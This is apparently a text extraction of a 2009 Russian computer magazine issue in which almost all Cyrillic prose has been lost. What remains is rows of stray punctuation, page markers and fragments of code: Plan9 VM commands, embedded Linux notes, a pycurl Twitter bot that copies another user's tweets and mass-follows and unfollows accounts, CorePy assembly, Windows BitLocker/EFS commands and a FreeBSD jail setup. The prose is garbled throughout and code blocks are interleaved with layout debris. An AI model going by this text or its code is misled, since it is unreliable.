echo net 0 00:11:22:33:44:55 > ctl
echo power on freeze > ctl
echo loadvm vmstate > ctl
echo unfreeze > ctl

:
#
#
#
#
#
#
#

mount -t 9p host1.org /mnt/9/1


mount -t 9p host2.org /mnt/9/2
tail -f /mnt/9/2/clone &
cd /mnt/9/1/0
echo freeze > ctl
echo 'clone 0 host2.org!7777/0' > ctl
echo power off > ctl

,
,
.

AXFS RAM
Linux
. .
Linux .

,
, . Linux ,
.
( ) , ,
,
.
. , ,
/proc. ? , X Server ,
framebuffer! . ,
,
flash-.
, , :
1. .
flash-
.
2. .
3. ,
.
X 04 /124/ 09

4. .
5. XIP (eXecute-In-Place), .. flash-, .
jffs2
, Nokia ubifs (
2.6.27) , .
XIP . .

NOR, , NAND-,
.

.
NOR- ,
, ,
RAM.
XIP , . ,
.
AXFS (Advanced XIP File System),
Linux Symposium 2008,
. 2.6.13, dcss- s390,
, flash-
( /mm/filemap_xip.c). AXFS xip- cramfs,
, . AXFS
64- ,
:
1. XIP NOR-.
2. NAND- (XIP ).
3. 4 4 .
4. , .
( ), ,
.
LIBFERRIS

. ,
. ,
API RPC.
,
: Gnome VFS,
, ssh-, ISO-;
KDE KIO, ; fuse,
. ,
Inferno Plan9,

.
libferris (www.libferris.com),
Linux Symposium, .
, (Firefox, X
Window) , XML- ,
,
, .
, libferris
,
Plan9. z

083

>> unixoid

DIVER
/ DIVER@EDU.IOFFE.RU /

Linux

>> unixoid

GNU/Linux
. , , . ?
, , : Linux . ,
.
. ?
?
: Linux? , ,
. Linux ,
. ,
- ( D-Link MIPS-, Linux).
, .
- .
, 16 , MMU ( ), ucLinux.
,
.
. - , :
.
( ).
Datasheets .
(
Linux ).
? ,
, .


, ,
. , ,
.

, . SFR (Special Function Register). , .

084

, / , ,
.
Linux
:
1. PDC .
-
,
DMA ( ), , , . , PDC , .
2. Memory Management Unit (, -, ).
PDC .
,
. 86/86-64
, . Linux, ,
. - ,
, Linux.
NAND-Flash CompactFlash,
, , , MMU. , Ethernet
USB-Host .
, Linux,
, . :
,
,
, ,
.
, .
IBM-PC
BIOS, GRUB LILO.
Linux , X 04 /124/ 09

>> unixoid

AT91SAM9
, ,
.
-
( -,
).
, ,
, . .
, ,
, , (,
-
, ).
, . ,
.


. ,
GNU GCC toolchain,
, . GNU C
86- ,
embedded-, , , 86-. -. ARM7/9/11 , ,
GNUARM (www.gnuarm.com), AVR GNU AVR (
, gcc-avr),
51 SDCC ( Linux
).

mkfs.(_), gzip cpio.
. . -,
JTAG, .
. JTAG- LPT- (, , www.diygadget.com/store/buildingsimple-jtag-cable/info_12.html) .
JTSG , .
Linux
(DBGU) . ,
Linux .
DBGU-,
X 04 /124/ 09

RS-232 , COM- (, COM-


).
- , cu ckermit, -

MMU ,
, ,
, . :
AT91SAM9
Dataflash NANDFlash.
SAM-BA Boot ROM . read-only
0x00, ,
. ,
.
, . SAM-BA
,
Dataflash NANDFlash 4
SRAM . SAM-BA , 0x00
. 4-
Flash-
SDRAM, ,
. ,
ARM.
MMU ,
External Bus Interface, 256 ,
.
.
(4 ) . .

085

>> unixoid
Software Packages.

. , Atmel AT91SAM9
AT91 Bootstrap.
JFFS2, FAT,
Linux. .

Soekris net5501: , VPN-


COM-, .
, , Linux
-.
USB,
, , C2 ActiveSerial.
, , ,
. ,
- .

,
, - .
, - , NAND-.
( Linux )
.
,
. ,
Atmel AT91SAM9260, Linux,
- ,
Data NAND-Flash .
, , ,
,
SAM-BA Boot, , USB ,
usbserial-. , , Atmel,
.
JTAG-,
, .

Linux.

U-Boot (www.denx.de/wiki/U-Boot). .
, , ,
. , U-Boot
.
Atmel AT91SAM AVR32, linux4sam.org
avrfreaks.net. RedBoot,
, . ,
, ,
- :). ,
, -

086

, ,
Linux -
, ,
, , , .
,
EmDebian (www.
emdebian.org). Debian ,
,
. ,
HowTo, .
.
,
, U-boot RedBoot (www.emdebian.org/
tools/bootloader.html).
, , Debian. , , .
? , Embedded
Gentoo (www.gentoo.org/proj/en/base/embedded)! , , U-Boot.
, Linux from
Scratch, OpenEmbedded (www.
openembedded.org). , , build- BitBake
, ,
. ,
, ,
IPK, RPM, DEB tar.gz .
,
, , , . , OpenWrt
(openwrt.org),
. ,
opkg,
dpkg/apt.
sources.list
- - .
( !)
. MontaVista (www.mvista.
com) OpenMoko c Neo FreeRunner
(openmoko.org). , , ,
. Google Nokia
, Linux Android N810.
MMU, , ARM7. ucLinux (uclinux.org/ports)
.
( ), ucLinux .


,
. ,
, , ,
! z
X 04 /124/ 09

++++

>> coding

++++

++++

++++
SPIRIT

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

/ HTTP://TUTAMC.COM /


Twitter Pythone


TweetTornado. -
(tweettornado.com) . ,
100 !
, ex-USSR
. z ,
,
. 4 :

. ,
( , , ,
),
, .

;
;
;
.

Python Linux
, Windows 2.5 pyCurl.
.

.
, , .

, .

++ ++

++++

++++

++++

++++

TWITTER

,
.
. , Twitter (twitter.com)
,
140 . :
, ,
( following). ,
(followers), .
2006 , -
2007. 5 .
, ( ), ,
,

088

API

Twitter .
API, POST- GET- .
(apiwiki.twitter.com). :
URL ;
, ;
(POST GET);
;
.
, ,
. , ,
X 04 /124/ 09

>> coding

, ,
HTTP Basic Authentication.
xml
, .
API Python.

PYTHON CURL

HTTP-
, ,
cURL.
pycURL:
import pycurl

,
pycURL , .
, , ,
StringIO.
StringIO write,
. :
import StringIO
data = StringIO.StringIO()



API ,
:
import pycurl, StringIO
data = StringIO.StringIO()
curl = pycurl.Curl()
curl.setopt(pycurl.URL,
'http://twitter.com/statuses/update.xml')
curl.setopt(pycurl.WRITEFUNCTION, data.write)
curl.setopt(pycurl.USERPWD,'spiritua:password')
curl.setopt(pycurl.POSTFIELDS,'status=TEXT')
curl.setopt(pycurl.POST,1)
curl.perform()
curl.close()
print data.getvalue()

, , .
spiritua:password , TEXT,
, .

, sys
:
import sys

pycURL , , xakep.ru. :
curl = pycurl.Curl()
#
curl.setopt(pycurl.URL, 'xakep.ru')
curl.setopt(pycurl.WRITEFUNCTION, data.write)
#
curl.perform()
#
curl.close()
#
print data.getvalue()

, setopt,
. , ,
socks IP 192.168.1.1, 2222
.
curl.setopt(pycurl.PROXYTYPE,
pycurl.PROXYTYPE_SOCKS5)
curl.setopt(pycurl.HTTPPROXYTUNNEL,1)
curl.setopt(pycurl.PROXY, '192.168.1.1:2222')
X 04 /124/ 09

TEXT sys.argv[1].
:
sender.py "I love XAKEP"

, ,
. .

,
, ,
. ? , ?
.
, cron (
) .
. API , GET- http://twitter.com/
statuses/user_timeline/spiritua.xml. spiritua
. xml
, :). xml ,

089

++++

>> coding

++++

++++

++++

import re, sys, pycurl, StringIO


#

++++

data = StringIO.StringIO()
curl = pycurl.Curl()
# donor -

++++

,
curl.setopt(pycurl.URL,
'twitter.com/statuses/user_timeline/
donor.xml')

++++

++++

warning


!

.
.

++++

curl.setopt(pycurl.WRITEFUNCTION,

.
xml-, ,
<text>.
, :

data.write)
#
curl.perform()
# c

<text>(.*)</text>.

donor
donor = re.findall("<text>(.*)</text>",

Python
re
findall, . :

data.getvalue())
#
data.truncate(0)
# user

++++

import re
rez = re.findall("<text>(.*)</text>",data)

links

++++

++++

++++

++++

cURL

http://pycurl.
sourceforge.net.
http://apiwiki.twitter.
com
API .
www.python.org

Python.

++++
dvd

++++

++++

'twitter.com/statuses/user_timeline/user.
xml')

:
;
, , ,
, .
, .
,
, ,
.

, ?

,
:

curl.perform()
# c my
my = re.findall("<text>(.*)</text>",
data.getvalue())
#
if donor[0] not in my:
#
curl.setopt(pycurl.URL,
'twitter.com/statuses/update.xml')
#
curl.setopt(pycurl.USERPWD, 'name:passwd')
curl.setopt(pycurl.POSTFIELDS,
'status=' + donor[0])

http://python.su/
forum
.

++ ++

++++

curl.setopt(pycurl.URL,

,

,


.

090

curl.setopt(pycurl.POST,1)
curl.perform()


, ID
URL: http://twitter.com/friendships/create/
id.format
(format): xml, json
: POST
: id ,
ID ,

: http://twitter.com/friendships/
create/bob.xml

print 'one update posted'


else:
print no new updates
#
curl.close()

1) .
2) .
3) .
, ,
.
,
. ,
X 04 /124/ 09

>> coding

. ,
, . ,

, . API , , Get-
URL http://twitter.com/statuses/public_timeline.xml, 20
. , , , ,
.
<screen_name>,
:
<screen_name>(.*)</screen_name>.

20 ,
. , , , ,
,
:).
API, , Post- URL http://twitter.com/friendships/create/
spirit.xml, spirit .
Python,
( ):
curl.setopt(pycurl.URL,
'http://twitter.com/friendships/create/' + name +
'.xml')

curl.setopt(pycurl.USERPWD,'spiritua:passwd')
curl.setopt(pycurl.POST,1)

20 . , , , Cron
, , ( ) (,
, . ).

(
)

URL: http://twitter.com/statuses/update.format
(format): xml, json
: POST
: status ,
. URL- . 140 .

X 04 /124/ 09

, ,
.
, . ,
, , .
URL:
http://twitter.com/statuses/friends.xml
http://twitter.com/statuses/followers.xml

, :
# cURL
curl.setopt(pycurl.URL,
'http://twitter.com/statuses/friends.xml')
curl.setopt(pycurl.USERPWD,spiritua:passwd')
curl.setopt(pycurl.WRITEFUNCTION, data.write)

091

++++

>> coding

++++

++++

++++

++++

++++

++++
Eclipse

++++
friends = re.findall("<screen_name>(.*)</screen_name>",
friends)
followers = re.findall("<screen_name>(.*)</screen_name>",
followers)

++++

++++

, URL http://
twitter.com/friendships/destroy/spirit.xml. (
):

++++

++++

++++

++++

++ ++

++++

++++

++++

++++



TweetTornado

# time sleep
import time
curl.setopt(pycurl.POST, 1)
#
for friend in friends:
#
if friend not in followers:
#
curl.setopt(pycurl.URL,
'http://twitter.com/friendships/destroy/+
friend+'.xml')
curl.perform() # 2
time.sleep(2)

#
curl.perform()
# friends
friends = data.getvalue()
#
data.truncate(0)
# ,
curl.setopt(pycurl.URL,
'http://twitter.com/statuses/followers.xml')
curl.perform()
followers = data.getvalue()

friends, followers
xml, .
<screen_name>, :

092

.
, . , , ,
,
.
. , . - 3 .
, 3
, 100
. ,
- 2000 . ,
.
. z
X 04 /124/ 09

++++

>> coding

++++

++++

++++

/ ALEKSEY.CHERKES@GMAIL.COM /

++++

++++

++++

++++

++++

++++

++++

++++

++++

++++

++ ++

++++

++++

++++

++++

Python CorePy
open source ,
. , , .
,
, .
. : Pythona.
, : ,
, , ,
. Python, , , .
, . ,
. Python
, ,
garbage collector! ,
,
, , ?
CorePy, .

CorePy Python, .
,
Python.
- Python-,
, C. , MMX SSE.
CorePy x86, x86_64 ( SSE),
PowerPC (PPC32 PPC64), VMX/AltiVec Cell SPU.
linux OS X. Microsoft Windows ;).

094

COREPY :

1) Instruction Set Architectures (ISAs). , .



(, x86 SSE).
2) InstructionStreams . 1.
.
3) Processors.
.
.

InstructionSream.
,
.
! , InstructionSream.
, . CorePy InstructionStream
.
, Processor.

!
- :
Python,
. .
, X 04 /124/ 09

>> coding
N ( 16 )
ASM-
SORT

, O N
(0 < N <= 1000).
!
0.8

core
psycho
trivial
sort

core
sort

0.7

(log) Timeline

0.6

Timeline

0.5

-1

-2

0.4

-3
0.3

-4
0.2

-5

0.1

0.0
0

2000

4000

200

400

600
N

800

1000

1200

. 0 < N <= 7000. ASM


,
SORT -

6000 8000 10000 12000 14000 16000


N

PSYCO-
, -

Title

core
psycho
trivial
sort

pshyco
trivial

1
(log) Timeline

Timeline

-3

200

400

600

800

1000

( ,
, ).
:
, , Python
;
, PsyCo;
;
sort, .
timeit. .
PyLab MatLab. , CorePy-, . ,
CorePy printer X 04 /124/ 09

-1
-2

00

-4

1000

2000

3000 N 4000

5000

6000

7000

.

NASM. ,
:). , , CorePy.
PsyCo Python-
z.
, CorePy
. x86
:).
. corepy.arch.*.isa ( * ).
,
. InstructionStream (

095

++++

>> coding

++++

++++

++++

++++

, CorePy

CorePy

# Platform: linux.spre_linux_x86_32

import corepy.arch.x86.isa as x86

BITS 32

import corepy.arch.x86.platform as env

SECTION .text

from corepy.arch.x86.types.registers import *

global bubble_sort

from corepy.arch.x86.lib.memory import MemRef

bubble_sort:
PROLOGUE:

++++

++++

code = env.InstructionStream()

push ebp

lbl_begin = code.get_label('BEGIN_ALL')

mov ebp, esp

lbl_loop = code.get_label('BEGIN_LOOP')

push edi

lbl_le = code.get_label('LE')

push esi

lbl_end = code.get_label('END_LOOP')

push ebx

is_finish = esi #

BODY:

x86.set_active_code(code)

BEGIN_ALL:

++++

mov esi, 0

# : -

mov ecx, 0

BEGIN_LOOP:

++++

++++

code.add(lbl_begin)

mov edi, dword [ebp + 8]

x86.mov(is_finish, 0)

mov eax, dword [edi + ecx * 4 + 0]

x86.mov(ecx, 0)

mov ebx, dword [edi + ecx * 4 + 4]

code.add(lbl_loop)

cmp eax, ebx

# edi

jle LE

# 4

mov esi, 1

x86.mov(edi, MemRef(ebp, 8))

mov dword [edi + ecx * 4 + 0], ebx

x86.mov(eax, MemRef(edi, disp=0, index=ecx, 4)

mov dword [edi + ecx * 4 + 4], eax

x86.mov(ebx, MemRef(edi, disp=4, index=ecx, 4)

inc ecx

# ...

cmp ecx, dword [ebp + 12]

x86.cmp(eax, ebx)

je END_LOOP

x86.jle(lbl_le)

LE:

++++

jmp BEGIN_LOOP
END_LOOP:

++++

x86.mov(is_finish, 1)

jne BEGIN_ALL

x86.mov(MemRef(edi, disp=0, index=ecx, 4), ebx)

EPILOGUE:

++++

cmp esi, 0

x86.mov(MemRef(edi, disp=4, index=ecx, 4), eax)

pop ebx

code.add(lbl_le)

pop esi

x86.inc(ecx)

pop edi

x86.cmp(ecx, MemRef(ebp, 12)) # ?

leave

x86.je(lbl_end)

ret

x86.jmp(lbl_loop)

++++

code.add(lbl_end)

code). add , :

++ ++

# ,
x86.cmp(is_finish, 0)
x86.jne(lbl_begin)

code.add(x86.mov(eax, 0)).

++++

++++

++++

++++

code eax.
. x86 ISA. code.add(),
x86.set_active_code(code)
ISA. code.
,
.
corepy.arch.x86.types.registers.
, : eax, bp .. :
. . is_finish esi.

096

, , .

. , x86
: , , , , .. . CorePy
MemRef ( ),
. : MemRef(0xABCD)
, MemRef(rip, -1024) ,
IP, MemRef(rsi, disp = 0, index = rcx, scale = 4)
= base + (index * scale) + disp (
). .
X 04 /124/ 09

>> coding
. Python .
,
. ,
CorePy, :
for i in xrange(0, 65): code.add(x86_isa.pop(edi))

, copy and paste, , 65 pop-, .


, ,
asm .

Emacs ,
,

. CorePy InstructionStream
: lbl_loop = code.get_label(LOOP).
lbl_loop , code . code
LOOP, . . :
code.add(lbl_loop) .
,
, . ,
, CorePy
: PROLOGUE, BODY
EPILOGUE. , , BODY.
. .
CorePy: ,
bp ..
CorePy .
Python- ExecParams.
: p1, p2, ... , p8
, .
Processor .
: . , ,
eax, : x86.mov(eax, MemRef(ebp, 16)).
. gp_return. ,

.
,
. , array
. Python.
, .
, ,
. array
buffer_info(),
. ,
. CorePy
extarray. array,
, .
.
, Linux huge pages,
X 04 /124/ 09

, !

,
.
.
N ( )
.
Python- PsyCo- .
, PsyCo , , ,
.
sort
sort
,
. , C,
. , , n**2, bubble sort :).

Python-
, CorePy
.
. , CorePy

. ,
,
:). , , . -
Python-, ,
, ( , ).
CorePy
.
: , ,
. ! z


import corepy.arch.x86.platform as env
proc = env.Processor()
params = env.ExecParams()
def sort(array):
bi = array.buffer_info()

params.p1 = bi[0]

params.p2 = bi[1] 1

proc.execute(code, params = params)# asm !

097

>> phreaking

VSHMUK
/ DIVER@EDU.IOFFE.RU /

>> phreaking

,
, , .
.
? .
.
, , . ,
. ?
,
.

: - ( ),
, - .
-, ,
, /. . , ,
. , ,
. ,
. , 36
, 38 40 . , .
, , ,
.
. ,

.
, .
, .
.
-, .

Atmel AT91SAM7X128.
ARM7.
:
USB-. , .

098

, , .
, , ,
8- ,
AT91SAM7X
. ,
, . , , :
, -;
,
. , - (
8- );
.

- . , /
. , Vishay TSOP18XX ( XX ).
5 3,3 , , ,
.
. ,
. Sony RM-836 36 , ,
TSOP1836, .


( , ). , 3,3
, 220 .
( relay ).
X 04 /124/ 09

>> phreaking

X 04 /124/ 09

099

>>
>> pc_zone
phreaking
+5V
,

~220V

,
.
-,
,
. -,
5 , 3,3 (
CMOS). ,
,
.
!
, , IRML2803
International Rectifier.
, .
KSD210AC8 Cosmo Electronics (http://
cosmo-ic.com/object/products/KSD210AC8.pdf). ,
, 4 , 5 12 ,
.
, - ( ), .
.
,
, ,
.
.
2-3 , , . ,
!

N-type
MOFSET

5 Ohm

MCU

.
, , -
.


. , , ,
. ,
, OUT GND
.

3
Control
Circuit

Input
PIN

Band
Pass

30
Denodulator

Vs
OUT

/ , ( =*, ?),
. ,
, :). ,
( )
(3,3 ), 220 .

- - ,
GND - . -
. . RC5 ( ), Philips, Sony, Sony.
,
,
.
(
( ,
). ,
). , 1 0,
, , , 0 1. Sony, RC5, .
, (!). , 1, , . -
, (,

, . , ,
, ). ,
. TTL (3,3-5 )
1-0-0, 1-0.
.
.
, .
MOSFET-
- , / , LSB/
, ( ).
, 25TTS
MSB - .
Vishay (http://www.vishay.com/docs/94384/94384.pdf). , ,

AGS

100

X 04 /124/ 09

>> phreaking

EFM
,
(, )
.
, / .

self-clocking .
, Manchester ( Ethernet) , ,
, .
, .
,
.
- CDROM, 8 14 , ,
, , , . , ,
,
( ) ( ) .
:
http://en.wikipedia.org/wiki/Manchester_code.
http://en.wikipedia.org/wiki/Eight-to-Fourteen_Modulation.

Google . ,
.
( pulse
space) , .

Sony , , .
0,6 , 4 ,
1+2 , 1+1.
:
0 (
, , ).
,
.
1. 2.4 .
, :
2.4 , ;
, - .
[!] , 0,
( ).
0.6 . , . 0.6, . -
, .
1.
,
X 04 /124/ 09

. 1.2 , ,
0.6 .
(LSB) [!].
7 , 5 .
40 ,

.
, , ,
(, ).

- . , .


ARM7.
, OUT-
, -,
. Datasheet 4.7
, .
-,
.
- , ,
.
!

. ,
, ,
, . ,
. -,
USB UART. ,
, . .
, ,
, , - . , ,
. ,
. , -. z

-
, , . ,

. , , , .
.
(), , - . ,


.
, ,
.

101

>> phreaking

DOCTOR V_M_E_N
/ YURIK_YUROK2@MAIL.RU /

>> phreaking

, , ,
. , .
,
.
, - Apple
. ,
,
. ,

.
, , ,
, . ,
, .

http://www.xakep.ru/post/22867/default.asp.

. , , ,
.
- , , . ,
- -
. ,
-110.
0.1 . :
(1-1.5 ) 700 .
6 + 800 .
0 . ( )
, 200 .
-110 90 .

, , ,
. , , ,
. ? :

102

1890-
(http://www.mirf.ru/Articles/art716.htm),
. ! ,
, .

HL2?
, ,
. , , ,
.
. (, :)) .
,
. ? ,
.
( ).
? ,
, . , 15 ,
, ,
, . , ,
300 ,
.
,
. , .

, : ,
.
,
1515 , (,
). ,
X 04 /124/ 09

>> phreaking


. :
, , , .
,
, ! ,
,
10-15
. 10
5 . .


,
. ( -


,




, .
? . .) .
, .
, ? : .
, .
, ,
.

. , , .
, ,
, , , ,
. .

,
. , ,
. .
,
, .
, .
, ,
.

.
,
- .
, , , , ,
. , .
, ,
,
, . ,
.
.
.
, , , , ,
, .
,
,
.


, 100%
, . , , , , .
,
25% 15%.
, , . 50
.

X 04 /124/ 09

103

>>
>> pc_zone
phreaking

?
,

.
, .
:
.
,
,
. ,
,
( 10
mA) ,
10 .
. ,
,
,

.
,
.

,
10 /,
.
,
.
.

.
, , 10 .
,
.


,
.
.
. ,
,
. ,

,
.
, ,

104


, . ,

.
, ,
, .
.
,

.
. ,
, .

.
.
, 400
.
.
,
,
. ,

(,
300 20).

220 .
.
. ,
.
, , . ,
,
.

.

. ,
,
,
,
.

25-30 . , ,
, .
, . ?
: CRT-,
.
, .
, ,
, ,

( 900 ).
: ,
. , , , .
( 15%)
.


(
) , ,
. -


:
,
.. ,
,
,
.
.

.

,
, .
,
,
.
,
. ,

, ,
. .
,
, ,
,
-
.

? z
X 04 /124/ 09

>> phreaking

.
1. ,
.
2. .
3. .
4. .
5. (+) ,
(-). :
.
; ; .

X 04 /124/ 09

105

>> SYN/ACK
GRINDER
/ CORE@SYNACK.RU /

Win2k8:

>> SYN/ACK

, Win2k8, , -.
, ,
. ,
,
.
EFS
-
. Win2k8
, ,
. , ,
, . EFS (Encrypting File System), Microsoft,
Win2k. , . , Win2k8 -,
,
EFS,
.
Win2k8
AES 256- ( 3DES, DESX). . ,
EFS NTFS, / . FEK (File Encryption Key). FEK
- ( Win2k8
RSA 2048 ). DDF (Data Decryption Field, ) $EFS NTFS.
, , : , . , ,
. (
),

.
, EFS (, , -

106

FAT32), . .
EFS Win2k8 . (Advanced Attributes), .
(Encrypt contents to secure data) .
,
,
.
cipher.exe, EFS- .
. E () U () .
, cipher /?.
EFS ,
. ,
( ), .
, , . ,
, ,
:). , ,
.
EFS,
.
(Personal) (certmgr.msc).
EFS.
X 04 /124/ 09

>> SYN/ACK

, .
,
Trusted. , .
AD CS (Active Directory Certificate
Services).
.
EFS .
, .

, ,
, . ,
. .
(.pfx). ,

. certmgr.msc. ,
, .

BitLocker,
Vista, Ultimate/Enterprise, , EFS. ( Windows ,
). , , . , EFS,
BitLocker , .
AES 128- .
WMI (manage-bde.wsf)
256 . BitLocker , TPM (Trusted Platform Module). TPM-
, ,
, , .
BitLocker ,
, , , NTFS.
X 04 /124/ 09

,
( ) ,
Windows. ,
1.5 . , BitLocker . Microsoft
BitLocker Drive Preparation Tool (support.microsoft.com/
kb/933246).
, ,
, .
, TPM, . ,
Windows .

TPM, PIN- USB- .
, : TPM + PIN + USB-. TPM USB-.
TPM
, USB-
PIN-.
BitLocker , . Win2k8
. ,
BitLocker (BitLocker
Drive Encrypion). . :
> ServerManagerCmd -install BitLocker -restart

TPM,

TPM (tpm.msc). ,
, .
TPM . BitLocker
BitLocker (BitLocker Drive Encryption), . . ,
BitLocker (Turn On BitLocker)
(USB, ). BitLocker.

107

>> SYN/ACK

BitLocker ,

TPM BitLocker

info
.adm
.admx,

.admx
ADMX
Migrator,

Microsoft.
GPO Win2k3/
Win2k8

ADMX-.
Win2k8 ,

,
-.
BitLocker ,
.

EFS
, EFS
TPM, , ,
, BitLocker.

(gpedit.msc)
Windows
(Group Policy Object Editor Administrative Templates
Windows Component).
BitLocker (BitLocker Encryption)
:
.
BitLocker
TPM. TPM USB-. ,
,
gpupdate.exe /force.
Win2k8 BitLocker (BitLocker-RemoteAdminTool),
BitLocker . :
> ServerManagerCmd -install RSAT-BitLocker


, (Security Templates)
.inf. :
, (

108

, ,
, ),
, ,
. ,
user10
X Y, . ,
. ,
(Group Policy)
.
Win2k3 (
%systemroot%\security\templates) . , ,
, Secure*.inf-. Win2k8 ,
:
1. Defltbase.inf / .
2. Defltsv.inf , .
3. Defltdc.inf ,
.
: %systemroot%\inf ,
inf.
.
, , dcfirst.
inf .
X 04 /124/ 09

>> SYN/ACK

Win2k8

,
secedit.
, , MMC,
.
, .
,
, , .
, . , .
. ,
gpresult /v,
(RSOP).
GPO (Group Policy Objects), .
, . ,
, .
.

.

,
. *.inf . ,
,
.
MMC . , secedit GenerateRollback:
> secedit /GenerateRollback /CFG Defltsv.inf /
RBK Rollback.inf /log RollbackLog.log
X 04 /124/ 09

MMC

ADM/ADMX
( .adm) . ,
,
GPO, ( ).
ADM- , ,
(GPT). SYSVOL
. . , :).
Vista, Windows

XML .admx, . ADMX , GPO .
SYSVOL .
ADMX . ( ADM), ADMX
ADML. , ADM -,
.
. SYSVOL\Policies C:\Windows\PolicyDefinitions,
ADML- (
en_US ru_RU).
; .
ADM ADMX, ADMX ADMX Migrator, Microsoft. ADMX
XML-, , ADM. z

links

TPM

Wikipedia:
ru.wikipedia.org/wiki/
Trusted_Platform_
Module.


BitLocker (
)
AESCBC +
Elephant
go.microsoft.com/
fwlink/?LinkId=82824.

BitLocker
Microsoft BitLocker
Drive Preparation Tool
(support.microsoft.
com/kb/933246).

GPanswers.
com,
ADM/
ADMX.

109

>> SYN/ACK
J1M
/ ZOBNIN@GMAIL.COM /


FreeBSD Jail

>> SYN/ACK

FreeBSD
.
. jail,
, .

ftp-, , ,

,

You
are hacked!. , , ,
,
ftp-.
ftp-, ,

.

, .
: ,
.
( ),

,

.

, , ,
.
chroot(2),

110

,

. ,
/usr/chroot ( )
(
). , , ,

root, .
chroot,
,
, .
,
!

jail
chroot, ,
. , root
:
1. -
(, /dev/
kmem).
2. (
kern.securelevel kern.hostname).
3. .
4. .
5. .
6. raw ( ).
7. , IP- jail.

8. System V IPC ( ).
9.
ptrace(2).
jail , ,
,
.
, . ,
, .
,
.
,
jail, , ,
, . ,
,
( ).
, ,
,

.
. ,
.
X 04 /124/ 09

>> SYN/ACK

FreeBSD
Jail

1. JAIL-
/usr/src :
#
#
#
#
#

JAIL=/usr/jail/base
mkdir -p $JAIL
make world DESTDIR=$JAIL
make distribution DESTDIR=$JAIL
mount -t devfs devfs $JAIL/dev

/usr/jail/base

FreeBSD, /dev.

2.
. Jail- FreeBSD X 04 /124/ 09

IP-
, , -,
, , -, ,
IP
, jail.
IP- :
#
ifconfig
192.168.0.1/16

ed0

inet

alias

,
/etc/rc.conf:
# echo "ifconfig_ed0_alias0=\"inet

192.168.0.1\"" >> /etc/rc.conf

,

IP-, (10.0.0.0/8, 172.16.0.0/12,
192.168.0.0/16), .
.
- jail IP-,
,
IP-.
,
(, ssh
).

111

>> SYN/ACK

info

ipfw
fwd,


IPFIREWALL_
FORWARD.
,
jail

FreeBSD-.
!

, jail-

:
# echo "inetd_flags=\"-wW -a <IP-
>\"">> /etc/rc.conf

, (rpcbind, nfsd, mountd)


IP-,
jail- . IP-
, jail- .
( ssh):
# ipfw add fwd 192.168.0.1,22 tcp from any to
-ip 22

sendmail_enable="NO"
sendmail_submit_enable="NO"
sendmail_outbound_enable="NO"
sendmail_msp_queue_enable="NO"
sshd_enable="YES"

, , ,
exit <Ctrl+D>.
IP- ,
. jail
IP, , ,
, DNS-.
ssh- jail-, , ? PREFIX :
# make PREFIX=/usr/jail/base make install clean

3. JAIL-
jail- FreeBSD
/etc/rc. jail
, . :
# jail /usr/jail/base base.jail 192.168.0.1 /
bin/sh

:
1. fstab (touch /etc/fstab), .
2. (passwd
root) , , .
3. (newaliases),
sendmail.
4. (tzsetup).
5. /etc/resolv.conf , , jail, DNS-. -, DNS-.
6. /etc/rc.conf :

:
# pkg_add -P /usr/jail/base -1.0.0.tbz

portinstall:
# PREFIX=/usr/jail/base portinstall -P

,
. , jail-

FreeBSD, , .

, .
jail-.
, .
unionfs nullfs /
usr/ports :
# mount_unionfs /usr/ports /usr/jail/base/usr/ports

# vi /etc/rc.conf
// jail-
hostname="base.jail"
// ( )
network_interfaces=""
// /

112

# mount_nullfs /usr/ports /usr/jail/base/usr/ports

4. JAIL-
,
X 04 /124/ 09

>> SYN/ACK

Man jail: jail

jail-. /etc/
rc.conf :
# vi /etc/rc.conf
jail_enable="YES"
// jail-
jail_list="base"
// jail
jail_base_rootdir="/usr/jail/base"
jail_base_hostname="base.jail"
jail_base_ip="192.168.0.1"
jail_base_interface="de0"
//
jail_base_exec_start="/bin/sh /etc/rc"
jail_base_exec_stop="/bin/sh /etc/rc.shutdown"
// ?
jail_base_devfs_enable="YES"
jail_base_fdescfs_enable="NO"
jail_base_procfs_enable="NO"

, jail,
loopback-

,
. , , nginx,
reverse-proxy, jail. , apache, 8080. :
nginx, 80- apache. apache, nginx
jail. ?
nginx ( bash):
#
#
#
#

JAIL=/usr/jail/nginx
mkdir -p $JAIL
cd /usr/ports/www/nginx
make PREFIX=$JAIL install clean

, nginx :
# ldd $JAIL/sbin/nginx

/usr/jail/nginx/lib:
:
# /etc/rc.d/jail start base

jail- /usr/
sbin/jls. , , ps
top. J.


jail-, .
. , , ,
,
. ,
,
, , ssh-
. ,
?
,
, , . ,
, , , ,
ls, cd sh.
X 04 /124/ 09

# mkdir -p $JAIL/lib
# LIBS='ldd $JAIL/sbin/nginx|grep -v ':$'|cut -f 3 -d " "'
# for LIB in $LIBS; do cp $LIB $JAIL/lib; done

, ld-elf.so.1,
:
#
#
#
#

mkdir -p $JAIL/libexec
cp /libexec/ld-elf.so.1 $JAIL/libexec
mkdir -p $JAIL/var/run
ldconfig -s -f $JAIL/var/run/ld-elf.so.hints $JAIL/lib

www:
# echo 'www:*:80:80::0:0:World Wide Web Owner:/
nonexistent:/usr/sbin/nologin' > $JAIL/etc/passwd
# cp $JAIL/etc/{passwd,master.passwd}
# pwd_mkdb -d $JAIL/etc $JAIL/etc/master.passwd
# echo 'www:*:80:' > $JAIL/etc/group

, :
# mkdir -p $JAIL/var/{log,tmp/nginx}
# chown 80:80 $JAIL/var/tmp/nginx

113

>> .PRO
SYN/ACK

nginx
Nginx (engine x) HTTP- . HTTP-,
apache,
. wordpress.com
. 2002- .

# mkdir $JAIL/{dev,tmp}
# chmod 7777 $JAIL/tmp

devfs:
# mount -t devfs devfs $JAIL/dev

sysctl,

1 security.jail.set_hostname_allowed jail- (hostname) jail-.


,
, DNS-. 2 security.jail.allow_raw_sockets
jail- raw-.
,
, .
3 security.jail.chflags_allowed jail- (chflags). ,
jail , .

IP- HTTP- IP- :


# ifconfig ed0 inet alias 192.168.0.1/16
# ipfw add fwd 192.168.0.1,80 tcp from any to -ip 80

nginx server :
# vi /usr/jail/nginx/etc/nginx/nginx.conf
server {
listen 80;
server_name www.host.ru;
location / {
proxy_pass http://127.0.0.1:8080/;
proxy_redirect off;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_
forwarded_for;
client_max_body_size 10m;
client_body_buffer_size 128k;
proxy_connect_timeout 90;
proxy_send_timeout 90;
proxy_read_timeout 90;
proxy_buffer_size 4k;
proxy_buffers 4 32k;
proxy_busy_buffers_size 64k;
proxy_temp_file_write_size 64k;
}
}

,
nginx, /usr/jail/nginx.
